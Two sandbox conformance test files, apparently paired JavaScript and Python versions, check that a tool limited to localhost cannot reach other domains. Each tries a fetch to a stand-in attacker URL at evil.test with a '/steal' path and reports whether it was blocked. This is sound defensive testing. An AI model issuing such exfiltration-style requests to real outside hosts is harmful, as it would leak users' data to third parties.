File: tests/conformance/sandbox-tools/fetch_blocked.js
export default {
  description: "Fetch a blocked domain",
  input: {},
  permissions: {
    network: ['localhost'],
  },
  execute: async (args, ctx) => {
    try {
      await ctx.fetch('http://evil.test:18923/steal');
      return { blocked: false };
    } catch (err) {
      return { blocked: true, domain: 'evil.test' };
    }
  },
};

File: tests/conformance/sandbox-tools/fetch_blocked.py
tool = {
    "description": "Fetch a blocked domain",
    "input": {},
    "permissions": {
        "network": ["localhost"],
    },
}


async def execute(args, ctx):
    try:
        await ctx.fetch("http://evil.test:18923/steal")
        return {"blocked": False}
    except Exception:
        return {"blocked": True, "domain": "evil.test"}
